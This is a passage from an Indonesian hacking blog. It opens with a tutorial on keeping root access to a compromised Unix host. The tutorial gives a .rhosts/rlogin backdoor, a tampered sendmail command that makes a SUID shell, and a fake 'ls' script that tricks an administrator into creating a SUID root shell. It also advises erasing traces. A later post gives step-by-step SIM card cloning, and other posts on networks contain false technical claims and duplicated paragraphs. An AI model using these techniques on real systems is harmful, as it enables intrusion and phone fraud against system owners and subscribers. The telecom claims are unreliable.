dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik

root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali

menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang

sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port

6969) kamu tinggal:

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

dan, BOOM!

korban#

shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar

ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan

SuperCock, atas ilmu ngent… engin badannya …" :) ). Tapi ingatlah untuk

segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu

kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi

udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala

spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan

bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan

service-service yang jarang (hampir tidak pernah dipakai) seperti

utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan

bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem

mempunyai program audit keamanan yang akan mensensus seluruh file berbit

SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi

homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu

program yang sudah berjalan / terinstal secara default, seperti xterm dan

splitvt, sehingga sebuah option rootshell akan secara otomatis

execv("/bin/sh", "sh", NULL);.

Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel

kelas kacangan ini), kamu bisa modifikasi daemon-daemon yang sedang

berjalan untuk menerima perintah-perintah hasil karangan kamu sendiri.

Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah

berhasil memodifikasi program sendmail di server korban.com (PSM=Pukulan

Sinar Matahari):

212@GG> telnet korban.com 25

Trying mesin.korban.com …

Connected to mesin.korban.com.

Escape character is '^]'.

220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; … [snip] …

PSM_EXEC /bin/cp /bin/sh /tmp/elit

Done … master!

PSM_EXEC /bin/chmod 4755 /tmp/elit

Done … master!

Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan

segala kerendahan hati minta izin untuk berguru!

3 Trojan Horse

===============

Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya

Trojan Horse hanya efektif jika kamu betul-betul pintar menutupi suatu

program atau jika sang sysadmin memang betul-betul tolol. Pada prinsipnya,

Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu

membuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan

perintah untuk membuka akses di dalam kode game kamu, sedemikian rupa

sehingga saat sang sysadmin menjalankan program tersebut, tanpa

disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang

hacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan mempunyai

banyak peminat. Beberapa 'lamers' mendownload skrip tersebut tanpa

menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan

akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)

4 Trapdoor

===========

Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun

dalam artikel ini, 'Trapdoor' diasumsikan sebagai cara yang bisa kita

gunakan untuk menjebak (trap) sang sysadmin untuk memberikan kita akses

root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang

paling gres, atau sebuah sistem dimana hampir semua eksploit untuk

mendapatkan root tidak berjalan sama sekali (patched systems). Jangan

putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang

sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu

sudah berhari-hari mengoprek sebuah target dengan menggunakan account dan

password seorang user biasa hasil colongan lewat phf, dan sayangnya tidak

ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.

Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa

mengelabui puluhan sysadmin diluar sana.

Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir

milik user yang accountnya kamu 'pinjam'):

user1@korban> chmod 700 ~/.

Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu

mengganti privilesenya ke root jika beliau ingin memeriksa isi direktori

ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang bertugas

untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan

sang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem.

Yang langsung terpikir olehmu, jelas, perintah ls. Disinilah letak

kelemahan UNIX dibanding … uh, MS-DOS. Dalam UNIX, seorang sysadmin yang

baik selalu mengetik 'full pathname' dari program manapun yang dia

jalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuan

kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan dalam daftar

search path. Jadi jika misalnya sang sysadmin melakukan:

root# pwd

/usr/home/staff/user1

root# ls

maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan

dalam direktori /usr/home/staff/user1 kita letakkan sebuah skrip bernama

'ls'? Heheheh … cukup menarik, khan. Nah, sekarang kita bisa buat sebuah

skrip yang berisi:

#!/bin/sh

cp /bin/sh /tmp/vi-save-902887

chown root /tmp/vi-save-902887

chmod 4755 /tmp/vi-save-902887

rm ./ls

simpan skrip tersebut di homedir user1, beri nama "ls" dan

user1@korban> chmod +x ls

sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk

mengecek isi homedir user1. Jika kamu kebetulan punya login/passwd untuk

user2 di mesin yang sama, maka kamu bisa saja 'mengundang' sang admin.

user1@korban> mail root@localhost

Subject: "Heheheh … Kena garap dari belakang!"

Hello sysadmin tolol! Mesin kamu sudah kebobolan!

ttd,

God of All Hackers, Virus Researchers and Lame Mailbombers,

Phardera

Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir

user1 (dengan perintah ls, tentunya), dan tanpa disadari sang sysadmin

telah menciptakan sebuah shell root di /tmp/vi-save-902887. Dan, karena

vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal

menyenangkan dengannya. Tinggal login sebagai user2 beberapa waktu

kemudian, dan nikmati ketenangan pikiran lewat shell root! Heheheh …

Kloning Nomor Handphone.

noreply@blogger.com (adesurya-online.blogspot.com) — Sun, 26 Oct 2008 05:23:00 +0000

Kloning nomor handphone? Mungkin itu salah satu berita yang sangat hangat dibicarakan sekarang ini. Penyebab nya tak lain adalah adanya dugaan pembunuhan penegak HAM (alm. Munir) menggunakan sarana ini. Sebenarnya peng-kloningan nomor handphone tidak lah sesulit yang dibayangkan, ini sangat mungkin bisa dilakukan oleh siapapun. Jadi kalau sudah begitu, pertanyaannya yang muncul dibenak saudara mungkin bagaimanakah cara melakukannya? Baiklah saya akan sedikit sharing ilmu dengan rekan-rekan semuanya tentang cara pengkloningan nomor handphone.

Pengkloningan nomor handphone dapat dilakukan dengan 2 cara yaitu yang pertama dengan menerobos system jaringan operator dan melakukan pengkloningan nomor handphone dan yang kedua menggunakan software/alat yang diproduksi oleh Taiwan. Apakah anda pernah mengalami kehilangan SIM handphone? Lalu anda datang kepada pihak operator dan hanya bermodalkan KTP serta materai anda bisa mendapatkan nomor anda kembali dalam beberapa menit proses. Kira-kira seperti itu lah proses peng-kloningan SIM handphone. Dimana pihak operator dapat melakukan pengkloningan SIM semaunya. Tapi dalam artikel ini saya tidak akan membahas bagaimana caranya untuk menerobos system operator seluler dan melakukan peng-kloningan karena hal ini sangat melanggar kode etik hacker dan bisa meresahkan masyarakat. Pada kali ini saya akan menerangkan sedikit cara pengkloningan menggunakan alat/software.

Kira-kira 1 tahun yang lalu, sebuah alat canggih telah diciptakan oleh Taiwan yang berfungsi untuk mengkloning nomor telepon. Alat itu mempunyai nama Sim Max dan Sim Master 3. Jika anda ingin mempunyai alat ini anda tidak perlu susah untuk mencarinya karena alat ini sudah masuk ke indonesia dan anda dapat mendapatkannya dengan budget yang terbilang murah untuk ukuran alat secanggih ini. Alat ini dibanderol dengan harga 1,5 juta/bundle (sudah termasuk alat dan Software). Bundle-an ini berisi master card sim yang kosong sebanyak 12 buah dan satu buah cd software.

Proses nya pun tidak terlalu sulit. Apakah anda pernah melakukan transfer data dari satu disket ke disket lainnya menggunakan komputer? Mirip begitulah proses peng-kloningannya. Proses ini menggunakan prinsip kerja reader SIM meng-copy ke komputer lalu kompputer meng-copy balik ke sim card yang masih kosong. Hanya dalam beberapa jam anda dapat melakukannya dengan sukses.

Untuk lebih jelasnya saya akan menjelaskan step by step untuk melakukannya :
Pertama-tama anda hubungan sim card reader itu ke computer. Lalu masukkan sim card induk atau yang ingin di cloning ke dalam sim card reader dan masukan CD yang disertakan, lalu software akan otomatis melakukan back-up data, seluruh data yang berada di sim akan pindah untuk sementara ke dalam hardisk komputer kita. Setelah itu masukkan sim card yang kosong dan ikuti langkah yang disediakan oleh SIM MAX, proses ini akan memakan waktu kira-kira 5 jam dan setelah itu sim card yang kosong tadi sudah bisa digunakan layaknya SIM asli dari operator seluler. Walaupun anda sudah berhasil meng-kloning SIM menjadi dua, anda hanya bisa menggunakan satu SIM saja, yaitu sim kosong yang baru saja anda gunakan untuk meng-copy tadi ini dikarenakan sewaktu register di network, operator sudah memblock network untuk SIM lama dikarenakan sudah tergolong expired..

Mungkin itu adalah step by step untuk melakukan peng-kloningan SIM handphone, jadi tidak ada alasan bagi terdakwa di pengadilan kasus HAM (Alm. Munir) untuk mengelak jika memang terbukti melakukan peng-kloningan nomor handphone, karena pada zaman sekarang tidak ada yang mustahil dilakukan menggunakan IT. Penulis menyadari mungkin artikel ini dikemudian hari akan menimbulkan dampak yang negatif, tapi penulis tidak bertanggung jawab atas dipublikasikannya artikel ini jika disuatu hari terjadi kejahatan terhadap aksi peng-kloningan nomor handphone itu sendiri. Itu tergantung respon dari rekan-rekan sendiri. Jika rekan-rekan mengganggap diri rekan-rekan adalah hacker sejati, mari kita sama-sama menjunjung tinggi sikap privacy orang dan seperti biasa tugas kita hanya untuk mencari kelemahan dan memberitahukannya kepada pihak yang berwajib bukan kita yang beraksi untuk mengacaukan keadaan.

Perbandingan GSM, CDMA Dan PSTN

noreply@blogger.com (adesurya-online.blogspot.com) — Wed, 10 Sep 2008 02:03:00 +0000

Pertama-tama sekali saya sampaikan permintaan maaf kepada para visitor in adesurya-online.blogspot.com, karena sudah lama saya tidak melakukan posting ulang pada site ini karena ada beberapa hal, untuk itu sekali lagi saya sampaikan permintaan maaf.
Mungkin pada artikel ini saya akan sedikit keluar jalur daripada judul site ini yaitu “Hacking Inspiration”, pada kesempatan kali ini saya akan coba memaparkan beberapa perbedaan dari jaringan wireless pada handphone GSM, CDMA dengan jaringan menggunakan kabel pada telepon PSTN atau telepon rumah.
Mungkin rekan-rekan semuanya pernah mendengar istilah TRIBAND, QUADBAND , EDGE, 3G/UMTS dan yang terbaru adalah jaringan HSDPA yang dapat melakukan access internet hingga kecepatan 3,6 MBPs. Itu semua adalah jenis jaringan wireless yang terdapat pada Handphone berjenis GSM. Jaringan GSM menggunakan jaringan canggih yang dapat menjangkau kita di manapun berbeda, jaringan GSM berbeda dengan jaringan CDMA yang hanya dapat mencakup wilayah tertentu. Jaringan CDMA biasanya menggunakan frekuensi radio oleh karena itu mungkin salah satu sebab kenapa setiap starter pack CDMA yang kita gunakan tidak bisa digunakan dengan nomor yang sama di daerah lain.
Dari pembahasan sederhana itu saja dapat kita lihat perbedaan mencolok dari kedua jenis jaringan telekomunikasi tersebut. Yang pertama, pada jaringan GSM yang menggunakan jaringan canggih yang mempunyai efek samping berbahaya yaitu efek radiasi yang sangat besar yang dapat merusak saraf pusat manusia, ini berbeda dengan jaringan CDMA yang hanya menggunakan frekuensi radio sehingga tidak terlalu memiliki efek radiasi yang tinggi. Tentu dibalik ada kelemahan pasti ada kelebihan yang dimiliki oleh jaringan GSM, antara lain kelebihan pada kejernihan suara nya karena menggunakan system satelit .
Mungkin itu sedikit gambaran tentang jaringan wireless pada handphone, sedangkan pada jaringan PSTN atau biasa di sebut dengan “saluran telepon rumah” adalah suatu jalur koneksi telepon yang sudah mempunyai line-nya masing-masing. Sehingga jika kita menggunakan PSTN jalur telepon kita sudah memiliki jalannya masing-masing. Keunggulan nya ialah pada PSTN tidak ada istilah network busy, ini dikarenakan masing-masing PSTN sudah memiliki jalur masing-masing, kelemahan pada jaringan ini ialah tidak dapat melakukan access internet langsung via modem DSL dengan kecepatan diatas dari 56 KBPs. Bisa dibayangkan dengan kecepatan begitu, jika anda ingin men-download file nya yang berukuran 20 MB. Bisa-bisa saja anda akan duduk di depan computer selama 1 jam. ini berbanding terbalik dengan jaringan Wireless pada handphone yang dapat melakukan acces internet hingga 3,6 MBPs.
Pastinya anda sering menyaksikan iklan-iklan operator yang biasa muncul di televisi dengan menggunakan kata-kata (maaf sebelumnya) “Telpon Kapan Saja Dimanapun Berkali-Kali Cuman 1000 perak”, atau kata-kata “Bukan Hanya Jam Pocong, Kini Siang Malam Telepon Gratis” dan kata-kata “Telepon cuman 0,5 sampe puas,,,”. Itu adalah segelintir kata-kata yang digunakan para operator untuk merayu calon komsumennya. Di balik itu harus anda ketahui bahwa dengan harga telepon fantastis tersebut operator mengorbankan kenyamanan dalam komunikasi.
Semakin banyak nya pengguna jaringan wireless tentunya makin banyak kouta jaringan yang harus di perlukan. Ini yang bukannya tidak dicermati oleh para pihak operator selular melainkan dibiarkan saja, seharusnya makin banyak kosumen suatu operator seluler seharusnya tower BTS yang berfungsi sebagai transmisi jaringan telepon wireless harus di tambah, jikalau tidak terjadi penambahan atau perbaikan akan terjadi jaringan sibuk pada jam tertentu sehingga jika kita ingin melakukan panggilan tidak akan bisa Tentunya ini akan sangat merugikan bagi konsumen yang memerlukan informasi up-to-date. Bisa anda bayangkan jikalau di suatu daerah terjadi bencana alam, pastinya setiap orang yang berada pada daerah tersebut akan melakukan panggilan telepon ke nomor handphone saudaranya. Bisa dibayangkan apa yang akan terjadi, dengan tower BTS yang apa adanya dan jaringan alakadarnya akan terjadi network busy jika kita melakukan panggilan secara bersamaan. Ini berbanding terbalik dengan jaringan PSTN yang sudah ada jalurnya. Tidak akan ada istilah network busy pada jaringan ini karena masing-masing jalur PSTN tidak akan saling bentrok.
Mungkin itu adalah sedikit gambaran yang saya paparkan kepada rekan-rekan semuanya tentang perbedaan jaringan GSM, CDMA, dan PSTN. Sekarang tergantung rekan-rekan untuk memilih yang mana yang baik diantara jaringan ada.

Apa itu Wireless Lan, Cara Membuat Antena Wajan Bolic Dan Setting nya

noreply@blogger.com (adesurya-online.blogspot.com) — Mon, 16 Jun 2008 12:55:00 +0000

Wireless LAN

1. Pengantar Jaringan Wireless LAN ( Jaringan lokal tanpa kabel )
Kita telah mengetahui dan mengenal tentang Local Area Network (LAN), dimana ia merupakan jaringan yang terbentuk dari gabungan beberapa komputer yang tersambung melalui saluran fisik (kabel). Seiring dengan perkembangan teknologi serta kebutuhan untuk akses jaringan yang mobile (bergerak) yang tidak membutuhkan kabel sebagai media tranmisinya, maka muncullah Wireless Local Area Network (Wireless LAN/WLAN).

Jaringan lokal tanpa kabel atau WLAN adalah suatu jaringan area lokal tanpa kabel dimana media transmisinya menggunakan frekuensi radio (RF) dan infrared (IR), untuk memberi sebuah koneksi jaringan ke seluruh pengguna dalam area disekitarnya. Area jangkauannya dapat berjarak dari ruangan kelas ke seluruh kampus atau dari kantor ke kantor yang lain dan berlainan gedung. Peranti yang umumnya digunakan untuk jaringan WLAN termasuk di dalamnya adalah PC, Laptop, PDA, telepon seluler, dan lain sebagainya. Teknologi WLAN ini memiliki kegunaan yang sangat banyak. Contohnya, pengguna mobile bisa menggunakan telepon seluler mereka untuk mengakses e-mail. Sementara itu para pelancong dengan laptopnya bisa terhubung ke internet ketika mereka sedang di bandara, kafe, kereta api dan tempat publik lainnya.
Spesifikasi yang digunakan dalam WLAN adalah 802.11 dari IEEE dimana ini juga sering disebut dengan WiFi (Wireless Fidelity) standar yang berhubungan dengan kecepatan akses data. Ada beberapa jenis spesifikasi dari 802,11 yaitu 802.11b, 802.11g, 802.11a, dan 802.11n

# Sejarah Wireless LAN
Pada akhir 1970-an IBM mengeluarkan hasil percobaan mereka dalam merancang WLAN dengan teknologi IR, perusahaan lain seperti Hewlett-Packard (HP) menguji WLAN dengan RF. Kedua perusahaan tersebut hanya mencapai data rate 100 Kbps.
Karena tidak memenuhi standar IEEE 802 untuk LAN yaitu 1 Mbps maka produknya tidak dipasarkan. Baru pada tahun 1985, (FCC) menetapkan pita Industrial, Scientific and Medical (ISM band) yaitu 902-928 MHz, 2400-2483.5 MHz dan 5725-5850 MHz yang bersifat tidak terlisensi, sehingga pengembangan WLAN secara komersial memasuki tahapan serius. Barulah pada tahun 1990 WLAN dapat dipasarkan dengan produk yang menggunakan teknik spread spectrum (SS) pada pita ISM, frekuensi terlisensi 18-19 GHz dan teknologi IR dengan data rate >1 Mbps.

Pada tahun 1997, sebuah lembaga independen bernama IEEE membuat spesifikasi/standar WLAN pertama yang diberi kode 802.11. Peralatan yang sesuai standar 802.11 dapat bekerja pada frekuensi 2,4GHz, dan kecepatan transfer data (throughput) teoritis maksimal 2Mbps.

Pada bulan Juli 1999, IEEE kembali mengeluarkan spesifikasi baru bernama 802.11b. Kecepatan transfer data teoritis maksimal yang dapat dicapai adalah 11 Mbps. Kecepatan tranfer data sebesar ini sebanding dengan Ethernet tradisional (IEEE 802.3 10Mbps atau 10Base-T). Peralatan yang menggunakan standar 802.11b juga bekerja pada frekuensi 2,4Ghz. Salah satu kekurangan peralatan wireless yang bekerja pada frekuensi ini adalah kemungkinan terjadinya interferensi dengan cordless phone, microwave oven, atau peralatan lain yang menggunakan gelombang radio pada frekuensi sama.

Pada saat hampir bersamaan, IEEE membuat spesifikasi 802.11a yang menggunakan teknik berbeda. Frekuensi yang digunakan 5Ghz, dan mendukung kecepatan transfer data teoritis maksimal sampai 54Mbps. Gelombang radio yang dipancarkan oleh peralatan 802.11a relatif sukar menembus dinding atau penghalang lainnya. Jarak jangkau gelombang radio relatif lebih pendek dibandingkan 802.11b. Secara teknis, 802.11b tidak kompatibel dengan 802.11a. Namun saat ini cukup banyak pabrik hardware yang membuat peralatan yang mendukung kedua standar tersebut.

Pada tahun 2002, IEEE membuat spesifikasi baru yang dapat menggabungkan kelebihan 802.11b dan 802.11a. Spesifikasi yang diberi kode 802.11g ini bekerja pada frekuensi 2,4Ghz dengan kecepatan transfer data teoritis maksimal 54Mbps. Peralatan 802.11g kompatibel dengan 802.11b, sehingga dapat saling dipertukarkan. Misalkan saja sebuah komputer yang menggunakan kartu jaringan 802.11g dapat memanfaatkan access point 802.11b, dan sebaliknya.

Pada tahun 2006, 802.11n dikembangkan dengan menggabungkan teknologi 802.11b, 802.11g. Teknologi yang diusung dikenal dengan istilah MIMO (Multiple Input Multiple Output) merupakan teknologi Wi-Fi terbaru. MIMO dibuat berdasarkan spesifikasi Pre-802.11n. Kata ”Pre-” menyatakan “Prestandard versions of 802.11n”. MIMO menawarkan peningkatan throughput, keunggulan reabilitas, dan peningkatan jumlah klien yg terkoneksi. Daya tembus MIMO terhadap penghalang lebih baik, selain itu jangkauannya lebih luas sehingga Anda dapat menempatkan laptop atau klien Wi-Fi sesuka hati. Access Point MIMO dapat menjangkau berbagai perlatan Wi-Fi yg ada disetiap sudut ruangan. Secara teknis MIMO lebih unggul dibandingkan saudara tuanya 802.11a/b/g. Access Point MIMO dapat mengenali gelombang radio yang dipancarkan oleh adapter Wi-Fi 802.11a/b/g. MIMO mendukung kompatibilitas mundur dengan 802.11 a/b/g. Peralatan Wi-Fi MIMO dapat menghasilkan kecepatan transfer data sebesar 108Mbps.

Pada saat hampir bersamaan, IEEE membuat spesifikasi 802.11a yang menggunakan teknik berbeda. Frekuensi yang digunakan 5Ghz, dan mendukung kecepatan transfer data teoritis maksimal sampai 54Mbps. Gelombang radio yang dipancarkan oleh peralatan 802.11a relatif sukar menembus dinding atau penghalang lainnya. Jarak jangkau gelombang radio relatif lebih pendek dibandingkan 802.11b. Secara teknis, 802.11b tidak kompatibel dengan 802.11a. Namun saat ini cukup banyak pabrik hardware yang membuat peralatan yang mendukung kedua standar tersebut.

Pada tahun 2002, IEEE membuat spesifikasi baru yang dapat menggabungkan kelebihan 802.11b dan 802.11a. Spesifikasi yang diberi kode 802.11g ini bekerja pada frekuensi 2,4Ghz dengan kecepatan transfer data teoritis maksimal 54Mbps. Peralatan 802.11g kompatibel dengan 802.11b, sehingga dapat saling dipertukarkan. Misalkan saja sebuah komputer yang menggunakan kartu jaringan 802.11g dapat memanfaatkan access point 802.11b, dan sebaliknya.

Pada tahun 2006, 802.11n dikembangkan dengan menggabungkan teknologi 802.11b, 802.11g. Teknologi yang diusung dikenal dengan istilah MIMO (Multiple Input Multiple Output) merupakan teknologi Wi-Fi terbaru. MIMO dibuat berdasarkan spesifikasi Pre-802.11n. Kata ”Pre-” menyatakan “Prestandard versions of 802.11n”. MIMO menawarkan peningkatan throughput, keunggulan reabilitas, dan peningkatan jumlah klien yg terkoneksi. Daya tembus MIMO terhadap penghalang lebih baik, selain itu jangkauannya lebih luas sehingga Anda dapat menempatkan laptop atau klien Wi-Fi sesuka hati. Access Point MIMO dapat menjangkau berbagai perlatan Wi-Fi yg ada disetiap sudut ruangan. Secara teknis MIMO lebih unggul dibandingkan saudara tuanya 802.11a/b/g. Access Point MIMO dapat mengenali gelombang radio yang dipancarkan oleh adapter Wi-Fi 802.11a/b/g. MIMO mendukung kompatibilitas mundur dengan 802.11 a/b/g. Peralatan Wi-Fi MIMO dapat menghasilkan kecepatan transfer data sebesar 108Mbp.

# Media Transmisi WLAN

Ada 2 media transmisi yang digunakan oleh Jaringan local tanpa kabel ini yaitu :

1. Frekuensi Radio ( RF)

Penggunaan RF tidak asing lagi bagi kita, contoh penggunaannya adalah pada stasiun radio, stasiun TV, telepon cordless dll. RF selalu dihadapi oleh masalah spektrum yang terbatas, sehingga harus dipertimbangkan cara memanfaatkan spektrum secara efisien. WLAN menggunakan RF sebagai media transmisi karena jangkauannya jauh, dapat menembus tembok, mendukung mobilitas yang tinggi, meng-cover daerah jauh lebih baik dari IR dan dapat digunakan di luar ruangan. WLAN, di sini, menggunakan pita ISM (Tabel 2) dan memanfaatkan teknik spread spectrum (DS atau FH).
* DS adalah teknik yang memodulasi sinyal informasi secara langsung dengan kode-kode tertentu (deretan kode Pseudonoise/PN dengan satuan chip).
* FH adalah teknik yang memodulasi sinyal informasi dengan frekuensi yang loncat-loncat (tidak konstan). Frekuensi yang berubah-ubah ini dipilih oleh kode-kode tertentu (PN)
3.
2. Infrared (IR)

Infrared banyak digunakan pada komunikasi jarak dekat, contoh paling umum pemakaian IR adalah remote control (untuk televisi). Gelombang IR mudah dibuat, harganya murah, lebih bersifat directional, tidak dapat menembus tembok atau benda gelap, memiliki fluktuasi daya tinggi dan dapat diinterferensi oleh cahaya matahari. Pengirim dan penerima IR menggunakan Light Emitting Diode (LED) dan Photo Sensitive Diode (PSD). WLAN menggunakan IR sebagai media transmisi karena IR dapat menawarkan data rate tinggi (100-an Mbps), konsumsi dayanya kecil dan harganya murah. WLAN dengan IR memiliki tiga macam teknik, yaitu Directed Beam IR (DBIR), Diffused IR (DFIR) dan Quasi Diffused IR (QDIR).
* DFIR
Teknik ini memanfaatkan komunikasi melalui pantulan. Keunggulannya adalah tidak memerlukan Line Of Sight (LOS) antara pengirim dan penerima dan menciptakan portabelitas terminal. Kelemahannya adalah membutuhkan daya yang tinggi, data rate dibatasi oleh multipath, berbahaya untuk mata telanjang dan resiko interferensi pada keadaan simultan adalah tinggi.
*
DBIR
Teknik ini menggunakan prinsip LOS, sehingga arah radiasinya harus diatur. Keunggulannya adalah konsumsi daya rendah, data rate tinggi dan tidak ada multipath. Kelemahannya adalah terminalnya harus fixed dan komunikasinya harus LOS.
*
QDIR
Setiap terminal berkomunikasi dengan pemantul, sehingga pola radiasi harus terarah. QDIR terletak antara DFIR dan DBIR (konsumsi daya lebih kecil dari DFIR dan jangkaunnya lebih jauh dari DBIR).

WLAN dengan RF memiki beberapa topologi sebagai berikut :

1. Tersentralisasi
Nama lainnya adalah star network atau hub based. Topologi ini terdiri dari server (c) dan beberapa terminal pengguna, di mana komunikasi antara terminal harus melalui server terlebih dahulu. Keunggulannya adalah daerah cakupan luas, transmisi relatif efisien dan desain terminal pengguna cukup sederhana karena kerumitan ada pada server. Kelemahannya adalah delay-nya besar dan jika server rusak maka jaringan tidak dapat bekerja.

Gambar : Topologi Bintang pada WLAN
2.
Terdistribusi
Dapat disebut peer to peer, di mana semua terminal dapat berkomunikasi satu sama lain tanpa memerlukan pengontrol (servers). Di sini, server diperlukan untuk mengoneksi WLAN ke LAN lain. Topologi ini dapat mendukung operasi mobile dan merupakan solusi ideal untuk jaringan ad hoc. Keunggulannya jika salah satu terminal rusak maka jaringan tetap berfungsi, delay-nya kecil dan kompleksitas perencanaan cukup minim. Kelemahannya adalah tidak memiliki unit pengontrol jaringan (kontrol daya, akses dan timing).

Gambar : Topologi peer to peer
3.
Jaringan selular
Jaringan ini cocok untuk melayani daerah dengan cakupan luas dan operasi mobile. Jaringan ini memanfaatkan konsep microcell, teknik frequency reuse dan teknik handover. Keunggulannya adalah dapat menggabungkan keunggulan dan menghapus kelemahan dari ke dua topologi di atas. Kelemahannya adalah memiliki kompleksitas perencanaan yang tinggi.

Gambar : Topologi jaringan seluler

Komponen Wireless LAN

1. Access Point (AP)
Pada WLAN, alat untuk mentransmisikan data disebut dengan Access Point dan terhubung dengan jaringan LAN melalui kabel. Fungsi dari AP adalah mengirim dan menerima data, sebagai buffer data antara WLAN dengan Wired LAN, mengkonversi sinyal frekuensi radio (RF) menjadi sinyal digital yang akan disalukan melalui kabel atau disalurkan keperangkat WLAN yang lain dengan dikonversi ulang menjadi sinyal frekuensi radio.

Satu AP dapat melayani sejumlah user sampai 30 user. Karena dengan semakin banyaknya user yang terhubung ke AP maka kecepatan yang diperoleh tiap user juga akan semakin berkurang. Ini beberapa contoh produk AP dari beberapa vendor.

Gambar : Access Point dari produk Linksys, Symaster, Dlink
2. Extension Point
Untuk mengatasi berbagai problem khusus dalam topologi jaringan, designer dapat menambahkan extension point untuk memperluas cakupan jaringan. Extension point hanya berfungsi layaknya repeater untuk client di tempat yang lebih jauh. Syarat agar antara akses point bisa berkomunikasi satu dengan yang lain, yaitu setting channel di masing-masing AP harus sama. Selain itu SSID (Service Set Identifier) yang digunakan juga harus sama. Dalam praktek dilapangan biasanya untuk aplikasi extension point hendaknya dilakukan dengan menggunakan merk AP yang sama.

Gambar : Jaringan menggunakan Extension Point
3. Antena
Antena merupakan alat untuk mentransformasikan sinyal radio yang merambat pada sebuah konduktor menjadi gelombang elektromagnetik yang merambat diudara. Antena memiliki sifat resonansi, sehingga antena akan beroperasi pada daerah tertentu. Ada beberapa tipe antena yang dapat mendukung implementasi WLAN, yaitu :
1. Antena omnidirectional

Yaitu jenis antena yang memiliki pola pancaran sinyal kesegala arah dengan daya yang sama. Untuk menghasilkan cakupan area yang luas, gain dari antena omni directional harus memfokuskan dayanya secara horizontal (mendatar), dengan mengabaikan pola pemancaran ke atas dan kebawah, sehingga antena dapat diletakkan ditengah-tengah base station. Dengan demikian keuntungan dari antena jenis ini adalah dapat melayani jumlah pengguna yang lebih banyak. Namun, kesulitannya adalah pada pengalokasian frekuensi untuk setiap sel agar tidak terjadi interferensi.

Gambar : Jangkauan area Antena omnidirectional
2. Antena directional

Yaitu antena yang mempunyai pola pemancaran sinyal dengan satu arah tertentu. Antena ini idealnya digunakan sebagai penghubung antar gedung atau untuk daerah yang mempunyai konfigurasi cakupan area yang kecil seperti pada lorong-lorong yang panjang.

4. Wireless LAN Card
WLAN Card dapat berupa PCMCIA (Personal Computer Memory Card International Association), ISA Card, USB Card atau Ethernet Card. PCMCIA digunakan untuk notebook, sedangkan yang lainnya digunakan pada komputer desktop. WLAN Card ini berfungsi sebagai interface antara system operasi jaringan client dengan format interface udara ke AP. Khusus notebook yang keluaran terbaru maka WLAN Cardnya sudah menyatu didalamnya. Sehingga tidak keliatan dari luar.

"I'M On SMS" No Problem (Men non Aktifkan I'M on SMS)

noreply@blogger.com (adesurya-online.blogspot.com) — Thu, 12 Jun 2008 15:07:00 +0000

Artikel ini gw tulis karena banyak permintaan dari temen-temen tentang gmana caranya non aktifin status “I’m On SMS” pada YM. Menurut rekan-rekan, selain ngeribetin juga banyak problemnya, contohnya kalo kita melakukan sign out sewaktu bermain YM maka akan dikirimkan pesan berapa orang yang lagi online ke nomor hp kita (ribet g tu),,,

Bisa dibayangin kan brapa kali kita menerima pesan itu tiap hari kalo kita sering online n tau g nieh yang lebih parahnya, kadang-kadang YM kita itu aktif ndiri lo walaupun kita g lagi onlie, gawat g tu… apalagi kalo cewek kita juga lage online, truz dia PM ke kita n kita g jawab… Bisa jadi perang dunia ke 3 tu, hehehehe (maklum admin dah pengalaman :-P)

Ok g usah basa basi kita langsung aja mulai prakteknya,,, lets get the out (keren g tuh)
Langkah 1: Login ke YM melalui E-mail kamu yang bermasalah (Yang ada status I’M
On SMS nya)
Langkah 2: Ambil Tab Messenger trus ambil Preferences..
Langkah 3: Ambil Tab General truz cari yang ada tulisan always sign in to my mobile device when I exit messenger,, kalo dah ketemu ilangin dah tanda ceklis itu
Setelah itu teken apply n teken OK…

Berez deh…. Aman kan… Mungkin ini hanya ilmu yang g berguna bagi crew senior-senior hacker smuanya, tapi ingat sebelum kita jadi senior pasti kita mulai dari bawah jadi jangan pernah ngeremehin junior-junior nya (keren kan kata-kata gw)…

Denial of Service (DoS)

